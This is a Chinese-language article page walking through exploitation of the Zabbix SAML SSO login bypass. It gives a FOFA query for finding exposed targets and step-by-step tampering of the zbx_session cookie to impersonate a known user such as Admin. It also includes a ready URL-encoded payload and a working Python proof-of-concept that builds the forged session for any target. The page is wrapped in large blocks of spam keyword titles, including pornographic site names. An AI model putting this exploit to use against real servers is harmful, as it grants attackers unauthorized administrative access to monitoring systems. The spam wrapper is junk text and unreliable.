成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久

您的位置:首頁技術文章
文章詳情頁

Zabbix SAML SSO 登錄繞過漏洞的操作流程

瀏覽:522日期:2023-04-06 15:09:27
目錄
  • 一、簡介
  • 二、FOFA語法
  • 三、復現流程

一、簡介

zabbix是一個基于WEB界面的提供分布式系統監視以及網絡監視功能的企業級的開源解決方案。zabbix能監視各種網絡參數,保證服務器系統的安全運營;并提供靈活的通知機制以讓系統管理員快速定位/解決存在的各種問題。

zabbix server可以通過SNMP,zabbix agent,ping,端口監視等方法提供對遠程服務器/網絡狀態的監視,數據收集等功能,它可以運行在Linux,Solaris,HP-UX,AIX,Free BSD,Open BSD,OS X等平臺上。

該漏洞源于在啟用 saml SSO 身份驗證(非默認)的情況下,未身份驗證的攻擊者可以修改會話數據,成功繞過前臺進入后臺,因為存儲在會話中的用戶登錄未經過驗證。

漏洞的限制條件:需要啟用 SAML 身份驗證,并且攻擊者必須知道 Zabbix 用戶的用戶名。

二、FOFA語法

app=“ZABBIX-監控系統” && body=“SAML”

三、復現流程

1、通過fofa語法搜索zabbix資產訪問首頁獲取set-cookie中zbx_session參數的值

2、通過Url解碼和Base64解碼獲得zbx_session參數Json格式數據

{"sessionid":"67f71355eb96121f384ea0571290faca","sign":"Uyq2BXQfe5Iug4UBpucwq3PXAmVh0ctpR4pvEfzg\/OWe7TKhmAQdqyu5iUmtWzQR+0m33eQBHnk1VV+IO0icAQ=="}

3、通過在Json中添加saml_data和username_attribute參數后重新Base64編碼和Url編碼構造Payload

{"saml_data":{"username_attribute":"Admin"},"sessionid":"67f71355eb96121f384ea0571290faca","sign":"Uyq2BXQfe5Iug4UBpucwq3PXAmVh0ctpR4pvEfzg\/OWe7TKhmAQdqyu5iUmtWzQR+0m33eQBHnk1VV+IO0icAQ=="}

4、把構造好的payload進行base64編碼和url編碼

%65%79%4a%7a%59%57%31%73%58%32%52%68%64%47%45%69%4f%6e%73%69%64%58%4e%6c%63%6d%35%68%62%57%56%66%59%58%52%30%63%6d%6c%69%64%58%52%6c%49%6a%6f%69%51%57%52%74%61%57%34%69%66%53%77%69%63%32%56%7a%63%32%6c%76%62%6d%6c%6b%49%6a%6f%69%4e%6a%64%6d%4e%7a%45%7a%4e%54%56%6c%59%6a%6b%32%4d%54%49%78%5a%6a%4d%34%4e%47%56%68%4d%44%55%33%4d%54%49%35%4d%47%5a%68%59%32%45%69%4c%43%4a%7a%61%57%64%75%49%6a%6f%69%56%58%6c%78%4d%6b%4a%59%55%57%5a%6c%4e%55%6c%31%5a%7a%52%56%51%6e%42%31%59%33%64%78%4d%31%42%59%51%57%31%57%61%44%42%6a%64%48%42%53%4e%48%42%32%52%57%5a%36%5a%31%77%76%54%31%64%6c%4e%31%52%4c%61%47%31%42%55%57%52%78%65%58%55%31%61%56%56%74%64%46%64%36%55%56%49%72%4d%47%30%7a%4d%32%56%52%51%6b%68%75%61%7a%46%57%56%69%74%4a%54%7a%42%70%59%30%46%52%50%54%30%69%66%51%3d%3d

5、請求index_sso.php,在http請求頭中構造payload,將zbx_session的值替換為url編碼后的payload

6、成功登錄后臺

可利用poc直接獲取構造后的payload

poc:

import requestsimport reimport urllib.parseimport base64import jsonimport sys def exp(target, username):	resp = requests.get(url=target, verify=False)	cookie = resp.headers.get("Set-Cookie")	zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)	url_decode_data = urllib.parse.unquote(zbx_session[0], encoding="utf-8")	base64_decode_data = base64.b64decode(url_decode_data)	decode_to_str = str(base64_decode_data, encoding="utf-8")	to_json = json.loads(decode_to_str)	tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])	payloadJson = json.dumps(tmp_ojb)	print("decode_payload:", payloadJson)	payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))	print("zbx_signed_session:", payload)if __name__ == "__main__":	if len(sys.argv) != 3:		print("argv error")		exit(0)	target = sys.argv[1]	username = sys.argv[2]	exp(target, username)

到此這篇關于Zabbix SAML SSO 登錄繞過漏洞的文章就介紹到這了,更多相關Zabbix 登錄繞過漏洞內容請搜索以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持!

標簽: Zabbix
成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久
亚洲色图一区二区| 日日夜夜精品视频免费| 亚洲一区国产一区| 色综合久久天天综合网| 777a∨成人精品桃花网| 国产精品传媒入口麻豆| 日韩国产精品久久久久久亚洲| 成人免费看黄yyy456| 亚洲美女色禁图| 欧美三级韩国三级日本三斤| 国产日产欧美一区二区视频| 肉色丝袜一区二区| 久久精品国产清高在天天线| 精品999久久久| 亚洲欧美视频一区| 国产成人精品免费一区二区| 99亚洲一区二区| 综合精品久久久| 激情欧美丁香| 欧美精品在线一区二区| 夜夜嗨av一区二区三区四季av| 成人免费毛片a| 精品国产伦一区二区三区观看方式| 成人精品电影在线观看| 久久综合九色综合久99| 欧美高清在线一区二区| 捆绑紧缚一区二区三区视频| 亚洲天堂黄色| 日韩一区欧美小说| 国产老妇另类xxxxx| 国产精品推荐精品| 欧美精品一区二区三区高清aⅴ| 国产黄色精品视频| 日韩精品影音先锋| 日本大胆欧美人术艺术动态| 欧洲一区二区三区在线| 亚洲久草在线视频| 91麻豆产精品久久久久久| 91高清视频在线| 日韩一区中文字幕| 亚洲每日在线| 午夜成人在线视频| 欧美一区二区三区免费看| 欧美视频一区二区三区在线观看| 亚洲欧美韩国综合色| 日韩亚洲视频| 五月婷婷欧美视频| 欧美视频日韩视频在线观看| 丰满岳乱妇一区二区三区 | 国产一区二区三区黄| 午夜影视日本亚洲欧洲精品| 韩日成人av| 精品成人在线观看| 国产一区自拍视频| 亚洲图片一区二区| 一本色道久久精品| 国产精品理论在线观看| 成人丝袜视频网| 国产亚洲精品福利| 成人av在线影院| 日本一区二区成人在线| 先锋亚洲精品| 亚洲愉拍自拍另类高清精品| 国产一区高清视频| 亚洲一卡二卡三卡四卡| 欧美年轻男男videosbes| 美女视频黄免费的久久| 国产女主播一区二区| 蜜臀av在线播放一区二区三区| 欧美精品乱码久久久久久| 欧美在线高清| 亚洲综合免费观看高清完整版在线| 欧美亚洲愉拍一区二区| 成人黄色免费短视频| 亚洲男人的天堂在线观看| 欧美性大战久久久| 99国产精品99久久久久久| 精品国产91洋老外米糕| 亚洲大胆av| 成人欧美一区二区三区| 久久国产成人| 岛国av在线一区| 亚洲激情自拍偷拍| 91精品国产日韩91久久久久久| 国产一区二区日韩精品| 欧美色图在线观看| 91丝袜美腿高跟国产极品老师 | 在线观看的日韩av| 日韩国产欧美视频| 2023国产一二三区日本精品2022| 成人免费视频一区| 亚洲精品中文字幕在线观看| 3d动漫精品啪啪1区2区免费 | 欧美大片日本大片免费观看| 99国产精品视频免费观看一公开| 国产美女娇喘av呻吟久久| 最新国产の精品合集bt伙计| 欧美性生活久久| 精品av久久久久电影| 久草在线在线精品观看| 欧美人xxxx| 亚洲高清视频在线观看| 国产一区二区中文字幕| 亚洲欧美aⅴ...| 日韩精品自拍偷拍| 久久久水蜜桃av免费网站| 欧美成人日本| 欧美a级一区二区| 欧美三级韩国三级日本三斤| 国产精品大片免费观看| 国产一区二区精品久久| 亚洲一区自拍偷拍| 国产欧美日韩视频一区二区 | 黄色在线一区| 国产毛片一区二区| 亚洲综合色区另类av| 久久精品夜色噜噜亚洲aⅴ| 欧美午夜一区二区三区| 亚洲精品免费观看| 日韩有码一区二区三区| 欧美极品aⅴ影院| 欧美乱妇23p| 欧美专区在线| 黑人巨大精品欧美一区二区小视频| 国产馆精品极品| 视频一区视频二区在线观看| 国产精品天天看| 精品少妇一区二区三区免费观看| 欧美日韩理论| 亚洲一区二区精品3399| 久久久噜噜噜久久人人看| 永久域名在线精品| 成人综合婷婷国产精品久久 | 久久九九久久九九| 欧美日高清视频| 亚洲尤物影院| 国产综合激情| 99国产精品久| 成人黄色免费短视频| 久草这里只有精品视频| 午夜视黄欧洲亚洲| 亚洲老妇xxxxxx| 国产精品私人自拍| 久久久精品国产免费观看同学| 在线成人av网站| 欧美性感一区二区三区| 先锋影音久久久| 亚洲看片网站| 国产精品av一区二区| www.欧美日韩国产在线| 亚洲欧美日韩久久精品| 精品国产污污免费网站入口 | 成人免费在线播放视频| 久久综合久色欧美综合狠狠| 欧美一区二区三区四区五区 | 制服丝袜亚洲播放| 欧美色电影在线| 在线亚洲一区二区| 男人的天堂成人在线| 亚洲美女一区| 亚洲国产精品第一区二区| 国产精品激情| 激情偷拍久久| 尤物在线精品| 亚洲精品九九| 中文在线一区| 国产精品视频福利| 亚洲一区二区三区免费观看 | 国产精品视频麻豆| 337p粉嫩大胆色噜噜噜噜亚洲| 日韩一区二区在线看片| 在线视频免费在线观看一区二区| 黄色成人精品网站| 韩日精品视频| 亚洲黄色影院| 亚洲视频导航| 国产伦精品一区二区三区视频孕妇| 一区二区av| 免费久久久一本精品久久区| 久久av最新网址| 色噜噜狠狠成人网p站| 91国产视频在线观看| 欧美日韩视频第一区| 91精品国产综合久久国产大片| 欧美高清一级片在线| 日韩一区二区三区在线观看| 精品久久久久av影院| 国产亚洲综合色| 国产嫩草影院久久久久| 国产精品久久久一本精品| 亚洲天堂av一区| 亚洲一线二线三线视频| 日日骚欧美日韩| 日韩在线a电影| 狠狠色丁香婷综合久久| 亚洲成人综合网站| 日韩国产精品久久| 精品无人码麻豆乱码1区2区| 丰满亚洲少妇av| 色综合夜色一区|